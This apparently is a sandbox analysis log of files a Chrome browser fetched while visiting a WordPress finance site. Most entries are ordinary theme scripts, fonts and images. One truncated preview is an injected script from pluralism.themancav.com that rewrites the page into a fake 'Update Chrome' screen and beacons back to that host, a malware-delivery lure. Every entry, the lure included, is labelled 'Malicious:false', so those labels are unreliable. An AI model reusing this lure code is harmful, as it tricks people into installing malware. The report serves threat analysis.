                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotocondensed/v27/ieVj2ZhZI2eCN5jzbjEETS9weq8-19eLDwM9.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2..................*..........................".....t?HVAR.x.`?STAT.J'...J..~.../~.....`..]..Z.0..(.6.$..0. ..6. ..N[..q%.1v.).&".[5&....U.i...*.......n...w%......"c&.O.....sP..y..A.prd.{.t}Fg.!....=..P..p..$r.C.A).f..fC^g+..F.U..2...i..u....K....e= ..5..g E.).G.b..%.}K....25....R.s.....%~aUSW4....Z...R.h....h%..'/^.....%..../K..Uz.9......,._f?..C4....].....qf~.z=.....-.$.F....^.vtv.....Kt^;%..k...vq=*...n..N.Q.g..j.8|$.../M.e...95...'_.hjUw...h..........xG+;..y..(..&9B..&I;~D.}...n...O"..s...b........k.5VI.zc(.C".DhmTD.1.1........X..~L....7..Y}H....C.gE..{..q..J...R...Bb@.[\...T...m.t*.....u... V.V-..=w. .F?.......\....B....l..n...M.wb2...B(.@ h....R.u...XOD.b....-} ..b..>?s...G.!....2B..[...B...U.../.........=..0+T.-Lfn.@.T"t,...$$...c...-.6.K....d.YHD...6..f..S.c.3....}.+*c..V.P.. .1......3...9I.....>.u.....hj.......VoFV.|I...|\....7.....@...i._%Az.*.l......\.J5KTs....?..4,[.3HK..C.......!~N..{!.$D..bA.....$D....Hp-^A*h.ZZVJ;h.U..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):107193
                                                                                                                                                                                                                                                                        Entropy (8bit):6.063725900716539
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:ux37myXqbNdNfPgriKal+VYnwlQ92KHBNS:ucNfPgril+yGQkKHBNS
                                                                                                                                                                                                                                                                        MD5:8D95C06ACAC40A883F2D8ED01EC77645
                                                                                                                                                                                                                                                                        SHA1:1A8845185D7FDF5EBFDB977084B96006329D268F
                                                                                                                                                                                                                                                                        SHA-256:698A3109BF2E225962E45C95422520C0521C266A38B178B94EA677ED4BB84E15
                                                                                                                                                                                                                                                                        SHA-512:D83C60C0FB4317B994B7C99A22AD1B4FE4356ACF3EECE17E017C04C4BEE37381B040A2EA75C9FDB092C65DA42FA5A3E2756D71D3A8AC391C4390CEB5FACD47EA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://pluralism.themancav.com/NGNU7k9BN4dQQW7cAld4zEcXMZ4WWXaPWgI4l04GC4hEQXjMRkFuzF8MMpZNCi2CXggwgFEFLZpSBj+bFh4=
                                                                                                                                                                                                                                                                        Preview:(function(){window.localStorage[window.location.hostname]=1;var domain='https://pluralism.themancav.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var attrs=['class','style','lang','id','dir'];for(var i=0;i<elems.length;i++){for(var j=0;j<attrs.length;j++){try{elems[i].removeAttribute(attrs[j]);}catch(e){}}}document.head.innerHTML='<meta http-equiv="content-type" content="text/html; charset=UTF-8">'+'<meta charset="utf-8">'+'<title>Update Chrome</title>'+'<style> * {margin: 0;padding: 0;}html {overflow-y: scroll;}body {color: #333;font: 13px/18px \'Segoe UI\',sans-serif;font-weight: 400;}.compact {border-left: 26px transparent solid;border-right: 26px transparent solid;margin: 0 auto;max-width: 928px;}#header {height: 64px;position: relative;}.g-section:after {clear: both;content: ".";display: block;height: 0;visibility: hidden;}.g-section, .g-unit {zoom: 1;}#header-logo {margin-top: 20px;}.fatna
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):148
                                                                                                                                                                                                                                                                        Entropy (8bit):4.847169743993313
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:9eDNXYZMNYRosDgJRvFU+kif7xiRH81J4EvTeKTf:9ecP0JRLQRqJJvTDTf
                                                                                                                                                                                                                                                                        MD5:AA2A64B1A8F4EB74A6861F47AD5F5F43
                                                                                                                                                                                                                                                                        SHA1:7EF39A8480D887BB13EC002C93D5C97626AE7EC1
                                                                                                                                                                                                                                                                        SHA-256:5F787D7CFDAFC94621142F35B656B20425C6656DB79AFD2DDB576052EE794E71
                                                                                                                                                                                                                                                                        SHA-512:CAD4FBE35FD0427AABAF0DAA6558949E13CD4565DDCA3AC5B30A0F4F3672CA8416E746FD7C2FCC69C8E92545AF9A200F9B40200B004A87D1482B77234D3EF182
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(()=>{var r;(r=jQuery)(document).on("gform_post_render",(function(t,n){var o=r("#gform_"+n);o&&o.attr("target")&&window.hCaptchaBindEvents()}))})();
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (694), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):694
                                                                                                                                                                                                                                                                        Entropy (8bit):4.966017255100568
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:vCin/8PlnAYQhrLCxtxmR2Aj8XXfX8S0wkVpFhXPI:vCikPlnA9hqxtxqNIXPowk3FZw
                                                                                                                                                                                                                                                                        MD5:92C25705674444A62BD66A9608DB7CFD
                                                                                                                                                                                                                                                                        SHA1:29B3B7656EDEF73418450FF14B6DF6D6970ABBF4
                                                                                                                                                                                                                                                                        SHA-256:9367632D8901356EF14C68B71C23596CCB00FFC9903B1952EA0DFA5A801DECC0
                                                                                                                                                                                                                                                                        SHA-512:FAF3B5669D3570A7550135DEA7B5DDF9B33C4016991C7C2AD75CE183FE1FB03A2037BB5E2B0E3D9D79FEC0CD6ECA6866001F861E3917889121EED7F0D34D3B53
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(e,n,t){for(var i,a=0,m=function(e){i&&(n.requestAnimationFrame(m,e),jQuery.fx.tick())},r=["ms","moz","webkit","o"],o=0,u=r.length;o<u&&!n.requestAnimationFrame;++o)n.requestAnimationFrame=n[r[o]+"RequestAnimationFrame"],n.cancelAnimationFrame=n[r[o]+"CancelAnimationFrame"]||n[r[o]+"CancelRequestAnimationFrame"];n.requestAnimationFrame||(n.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),m=i-a,r=Math.max(0,16-m),o=n.setTimeout(function(){e(i+r)},r);return a=i+r,o}),n.cancelAnimationFrame||(n.cancelAnimationFrame=function(e){clearTimeout(e)}),jQuery.fx.timer=function(e){e()&&jQuery.timers.push(e)&&!i&&(i=!0,m(e.elem))},jQuery.fx.stop=function(){i=!1}}(jQuery,this)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4366), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4366
                                                                                                                                                                                                                                                                        Entropy (8bit):5.039727248640846
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:DqwDdwd5Rh4QVKmvF0gCKzNxvzgsrpXGvu4rEwp:GVigcigp4y
                                                                                                                                                                                                                                                                        MD5:C705EF91638E363C8889578125C08E36
                                                                                                                                                                                                                                                                        SHA1:DE12F676DCB87743C24A18BA64DC0A3746F7FB18
                                                                                                                                                                                                                                                                        SHA-256:31E6722068108FDA3FFDD3275ABFC3600930E7DAC9597C7948AB931E8B72AD56
                                                                                                                                                                                                                                                                        SHA-512:E4501054D8033CAA48DFA2A7DABE512E00DB3FF8D0BC48E7A934A3983B6980FABD02C1CF9B5539E7A93E03CFF6E476122970997053CF192B126F57CF409138CF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(a){function l(t,e){return"function"==typeof t?t.call(e):t}function h(t,e){this.$element=a(t),this.options=e,this.enabled=!0,this.fixTitle()}h.prototype={show:function(){var t=this.getTitle();if(t&&this.enabled){var e,i=this.tip(),s=(i.find(".tipsy-inner")[this.options.html?"html":"text"](t),i[0].className="tipsy",i.remove().css({top:0,left:0,visibility:"hidden",display:"block"}).prependTo(document.body),a.extend({},this.$element.offset(),{width:this.$element[0].offsetWidth,height:this.$element[0].offsetHeight})),n=i[0].offsetWidth,o=i[0].offsetHeight,t=l(this.options.gravity,this.$element[0]);switch(t.charAt(0)){case"n":e={top:s.top+s.height+this.options.offset,left:s.left+s.width/2-n/2};break;case"s":e={top:s.top-o-this.options.offset,left:s.left+s.width/2-n/2};break;case"e":e={top:s.top+s.height/2-o/2,left:s.left-n-this.options.offset};break;case"w":(extra_gap=0)<a("body").css("position").length&&"relative"==a("body").css("position")&&a("#wpadminbar").length&&(extra_gap=a("
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):148
                                                                                                                                                                                                                                                                        Entropy (8bit):4.847169743993313
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:9eDNXYZMNYRosDgJRvFU+kif7xiRH81J4EvTeKTf:9ecP0JRLQRqJJvTDTf
                                                                                                                                                                                                                                                                        MD5:AA2A64B1A8F4EB74A6861F47AD5F5F43
                                                                                                                                                                                                                                                                        SHA1:7EF39A8480D887BB13EC002C93D5C97626AE7EC1
                                                                                                                                                                                                                                                                        SHA-256:5F787D7CFDAFC94621142F35B656B20425C6656DB79AFD2DDB576052EE794E71
                                                                                                                                                                                                                                                                        SHA-512:CAD4FBE35FD0427AABAF0DAA6558949E13CD4565DDCA3AC5B30A0F4F3672CA8416E746FD7C2FCC69C8E92545AF9A200F9B40200B004A87D1482B77234D3EF182
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/hcaptcha-gravity-forms.min.js?ver=4.8.0
                                                                                                                                                                                                                                                                        Preview:(()=>{var r;(r=jQuery)(document).on("gform_post_render",(function(t,n){var o=r("#gform_"+n);o&&o.attr("target")&&window.hCaptchaBindEvents()}))})();
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4590), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4590
                                                                                                                                                                                                                                                                        Entropy (8bit):5.219194958963683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ri4boDtjOHBPTs7TbTY4VwkFdtlhPLU0VGoKls0V0TR7ru3jgZgygOtK3hv:ri4boQHBPTsTbTY4Mlq/tw
                                                                                                                                                                                                                                                                        MD5:68AEAED3F9D6F17F140A5311D7FB061A
                                                                                                                                                                                                                                                                        SHA1:953C2D556057FFEFFBB2302159DBCEEDA88CF9A9
                                                                                                                                                                                                                                                                        SHA-256:DF850553B1CBE723D3B8CCF5311346CC4E3B6F410FAAE63FF0D61EED78B6A66B
                                                                                                                                                                                                                                                                        SHA-512:11FF52BC3AE4FDBB347AE61AA7827C43E4447D918210C1A18F8650FE2AFA54BE8C3AE6D31E6E60FE5FADA5C60B57472E3C186E28C3F3729DE5F2FEC0822B05A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var $youtubeBGVideos={};function _fbRowGetAllElementsWithAttribute(e){var t,i,o=[],a=document.getElementsByTagName("*");for(t=0,i=a.length;t<i;t++)a[t].getAttribute(e)&&!jQuery(a[t]).parents(".tfs-slider").length&&o.push(a[t]);return o}function _fbRowOnPlayerReady(e){var t,i,o=e.target,a=0,d=!0;o.playVideo(),o.isMute&&o.mute(),0!==jQuery("[data-youtube-video-id="+o.getVideoData().video_id+"]").data("loop")&&(t=o.getCurrentTime(),i=+new Date/1e3,o.loopInterval=setInterval(function(){void 0!==o.loopTimeout&&clearTimeout(o.loopTimeout),t===o.getCurrentTime()?a=t+(+new Date/1e3-i):(a=o.getCurrentTime(),i=+new Date/1e3),t=o.getCurrentTime(),a+(d?.45:.21)>=o.getDuration()&&(o.pauseVideo(),o.seekTo(0),o.playVideo(),d=!1)},150))}function _fbRowOnPlayerStateChange(e){e.data===YT.PlayerState.ENDED?(void 0!==e.target.loopTimeout&&clearTimeout(e.target.loopTimeout),0!==jQuery("[data-youtube-video-id="+e.target.getVideoData().video_id+"]").data("loop")&&e.target.seekTo(0)):e.data===YT.PlayerState.P
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):18596
                                                                                                                                                                                                                                                                        Entropy (8bit):7.988788312296589
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
                                                                                                                                                                                                                                                                        MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                                                                                                                                                                                        SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                                                                                                                                                                                        SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                                                                                                                                                                                        SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (495), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):495
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9842019229973
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:E2d7Mwuhi2ALBAVAEwR33wePZWBdPZWBzcvpeGX92d7Mws:9Q3inaCNF3wePZCdPZCYv0GXOQD
                                                                                                                                                                                                                                                                        MD5:AAA4BAA259DF27598C811CE1E748D5CF
                                                                                                                                                                                                                                                                        SHA1:FECA05C5AD4CC632F9414039A1CCFF1E9FFF6C1D
                                                                                                                                                                                                                                                                        SHA-256:061BBBFD79681251B90A37FF17B5573ABB1CB658B47B4402A75A98568A34423E
                                                                                                                                                                                                                                                                        SHA-512:82D2BFA6E78C972DEAB582B2ADDC79CD224717850B5E8E68EE4725453632B9A8963D801600263233A299B654B0C7F87B2EDD8DBB4F5A0F2B2F460DFF6B3C8BB1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var avadaTriggerPageTitleFading=function(){void 0===cssua.ua.mobile&&("1"!==avadaFadeVars.page_title_fading&&1!==avadaFadeVars.page_title_fading&&!0!==avadaFadeVars.page_title_fading||("left"===avadaFadeVars.header_position||"right"===avadaFadeVars.header_position?jQuery(".fusion-page-title-wrapper").fusionScroller({type:"opacity",offset:0}):jQuery(".fusion-page-title-wrapper").fusionScroller({type:"opacity",offset:100})))};jQuery(window).on("load",function(){avadaTriggerPageTitleFading()})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 124 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1597
                                                                                                                                                                                                                                                                        Entropy (8bit):7.788121770576295
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:VpXVDH5ysGvBvHMO3TDp4pQ8qjQAO9Z2TS1:t5DGtTTDOqjQAO9gTS1
                                                                                                                                                                                                                                                                        MD5:4FA09B16D257EF2D09FFBAFC25A2049C
                                                                                                                                                                                                                                                                        SHA1:BABDBAFF41F160D56CE8EF5B79D20654EADFBD43
                                                                                                                                                                                                                                                                        SHA-256:842928E0C616F011DB3EBB36D37F783EA81B3BD44D7EDCBBCCDD3A394E6676D2
                                                                                                                                                                                                                                                                        SHA-512:636B2ADDAB0601F89E7D893D7F1315477D22D60E618EC22744D5A63C88A02147CD55D4C476333AEB14EC22002A7A764E9CD376972B3C87753BFDEF161DCF067A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://cdn.printfriendly.com/buttons/printfriendly-pdf-button-nobg-md.png
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...|.........."z.....gAMA......a.....IDATh..XkL\E.....[@.P.6KK.B..E........F.m...CLX@"..b#..URkcjS.6.M..C...bRi....?..6....>..Kfo.^...X..d.3g.9s.....B..D.D.D.D.D.D.D.D..>..Q.wz.R.&o.E....dS(D.j6{..0......9...2....#....s...ve.......u7K.b..!#.$.n$.yK.#.$U..Yny.x.....]y.....%Cv.W..F3.....]2q.[...e...s+:uy...v.+;.d.....>._.I^...#m...............+............[.}........!2.~..o..._.J.}.d...J.dh.n....P...u...K.;.z.d2..Z....If....._c.m........s....r......2.UD.eMy...;..p.,;.b....Mb.]....1...g.'vV.~..w..............|L...&5.R.AB.f.`m.....{:.....}.mS8...@O..4V...v+t.RSS.c..h.+.......,...q......z.....LH.~...Z.O,....".ybge`.4b..U.B.SN.s+]...9T..DnhUx...._./.2&.<.v....b.;q;.kiiY3:::.^....C...*.1.i.K......~L....5P.#./`.....^.h.........2r....Tx....Z.7.~.L...%.....d..!...E.3q..Dw..O+vl..TL..v[.^....h....188HE.d....-.u..j....`DjS.cy...>.w.AnD...... ........>.:.).....F..|>z.n.M@........1~.|..S.......k.O..@U>...^.;te.c6........._C.Y...f......k.....#....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                        Entropy (8bit):3.066054462414549
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:M3SLlHh/:f/
                                                                                                                                                                                                                                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                                                                                                                                                                                                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                                                                                                                                                                                                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                                                                                                                                                                                                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://pluralism.themancav.com/812BPoh/4leXf7sMxWmtHIAp5E7RZ6NSkjPlV5063k2HPPVN0XGjTYd/uw/ff/McyX/tVZ5//A==
                                                                                                                                                                                                                                                                        Preview:GIF87a........jl...,...........D..;
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13604), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):13604
                                                                                                                                                                                                                                                                        Entropy (8bit):5.148333221541441
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ri2gYV6qJ+Cq9N9N8qHNN/wNOVpGjcOiQ:u2gYJIVpGYOiQ
                                                                                                                                                                                                                                                                        MD5:C8E5CF5BB2B1762A2B2EEE0CCB58FAA0
                                                                                                                                                                                                                                                                        SHA1:789C3F9489D55A90E1819CC9B18CBC23035E48F0
                                                                                                                                                                                                                                                                        SHA-256:A67995BBD0B18BD66EF29DBFB5C82E055F74205ED150CB6A088326E6DFC0FCA2
                                                                                                                                                                                                                                                                        SHA-512:5E6D6BDBCA48B041CDA7BD14E2A5B3C3BB4BC810E3541DA8EAE4ABF9800976078E1EBB934E53AC7E6CBD8818E89B644B57E46D51C560836D6B1AD80D71481285
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function _fusionRefreshScroll(){window._fusionScrollTop=window.pageYOffset,window._fusionScrollLeft=window.pageXOffset}function _fusionParallaxAll(){var t;for(_fusionRefreshScroll(),t=0;t<window._fusionImageParallaxImages.length;t++)window._fusionImageParallaxImages[t].doParallax()}function _fusionRefreshWindow(){window._fusionScrollTop=window.pageYOffset,window._fusionWindowHeight=jQuery(window).height(),window._fusionScrollLeft=window.pageXOffset,window._fusionWindowWidth=jQuery(window).width()}!function(t){var i;i=0,t.requestAnimationFrame||(t.webkitRequestAnimationFrame&&(t.requestAnimationFrame=t.webkitRequestAnimationFrame,t.cancelAnimationFrame=t.webkitCancelAnimationFrame||t.webkitCancelRequestAnimationFrame),t.requestAnimationFrame=function(e){var s=(new Date).getTime(),a=Math.max(0,16-(s-i)),n=t.setTimeout(function(){e(s+a)},a);return i=s+a,n},t.cancelAnimationFrame=function(t){clearTimeout(t)}),"function"==typeof define&&define(function(){return t.requestAnimationFrame})}(wi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3376), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3376
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0578597325887875
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:7kREoRG00VvyZPUKM9vYl7K0lW4PxhwhCTg0V90HLwS4r90HP9q9DhWS63sHES3A:7CFQODYFuDhscHEScHE2
                                                                                                                                                                                                                                                                        MD5:53FCD9568E0875FA5C27A77D194A1577
                                                                                                                                                                                                                                                                        SHA1:9AD4677DCC599A0B83D48F0D748BEC34BA95E0FE
                                                                                                                                                                                                                                                                        SHA-256:D9E7769C013BA059B0A0AC4D67465B4CA69BCE171EA279D7EB4718213AB40242
                                                                                                                                                                                                                                                                        SHA-512:66C3ED0CBC5B18E1FE15B47D4ED86935B67D755E401911CB8F8382C3879797E61668846ACCA10077963798C71AB2DDC7D443C4B73DE2D4B64A1AAC679060246D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function playVideoAndPauseOthers(e){var i=jQuery(e).find("[data-youtube-video-id]").find("iframe"),t=jQuery(e).data("flexslider").slides.eq(jQuery(e).data("flexslider").currentSlide),o=t.find("[data-youtube-video-id]").find("iframe");i.each(function(){jQuery(this).attr("id")!==o.attr("id")&&void 0!==window.$youtube_players&&void 0!==window.$youtube_players[jQuery(this).attr("id")]&&window.$youtube_players[jQuery(this).attr("id")].stopVideo()}),o.length&&("function"!=typeof fusionGetConsent||fusionGetConsent("youtube"))&&void 0!==window.$youtube_players&&(!o.parents("li").hasClass("clone")&&o.parents("li").hasClass("flex-active-slide")&&"yes"===o.parents("li").attr("data-autoplay")&&(void 0===window.$youtube_players||void 0===window.$youtube_players[o.attr("id")]||void 0===window.$youtube_players[o.attr("id")].playVideo?fusionYouTubeTimeout(o.attr("id")):"slide"===jQuery(e).data("animation")&&0===e.currentSlide&&void 0===jQuery(e).data("iteration")?window.$youtube_players[o.attr("id")]&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 20884, version 1.0
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):20884
                                                                                                                                                                                                                                                                        Entropy (8bit):6.407471966913325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:60qpnsGsl9+DfCEH+eleJxnZnDwuJSnaLcIzGbu2I5fncEFUT/05:/qBsGsX+LF+elmVZDwuJdcxbu1qg5
                                                                                                                                                                                                                                                                        MD5:5821DF88DCCA2BF1E15CA638DC910050
                                                                                                                                                                                                                                                                        SHA1:C244E12CABE2A72F1D20F340D3DA6AB4F1374C2D
                                                                                                                                                                                                                                                                        SHA-256:FB47DC68F6A457C14C33D2ED6EB1E8A635D007F8868ED7E90E39A6FEAE9141A6
                                                                                                                                                                                                                                                                        SHA-512:08581751C385E39199C5A6EDEE5D8C8626A1397293936944A412962D1E3466A21AC7E5EB69BC9FC9954B3197E1432BD40BF079F7124303BA4A86FDB81C5CEB89
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.woff
                                                                                                                                                                                                                                                                        Preview:wOFF......Q.......QH........................OS/2.......`...`.R.%cmap...h...\...\.\..gasp................glyf......Jx..Jx./..head..MD...6...6%...hhea..M|...$...$...jhmtx..M....`...`C...loca..O.........$...maxp..O.... ... .i..name..O.........yIi.post..Qt... ... ...............................3...................................@............................ .................................@...L.@....... ...........%.*...B.q...............F.X.Z.].n.q.z............2.......... .............'...B.q...............F.X.Z.].n.p.z............2..........,.............+.............f.<.:.5./.................t.K.C...}.$........................................................................................................79..................79..................79.................3.[...!".....3!265.4&.#"&'&4?.401'..7>.;.2..0........1..#..".3......+."&'0'..'&167>.761>.;.2......U.VGddG..Gdd..o.....vK......o...L...-................o.....;...''[&%...p.......dG.VGddG..Gd.e..................!"
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):384
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773821070760564
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:zvt9teGX4XA50XiP50oP0yvtly2XDFTQJO7GBJjIaU0XiP50HugVOflfi0Vufkg8:zvpeGX4BW550yvfXhB7GBJvW5kulwIHp
                                                                                                                                                                                                                                                                        MD5:94EBDD5A8AF40D8E0612C70A0725F7D8
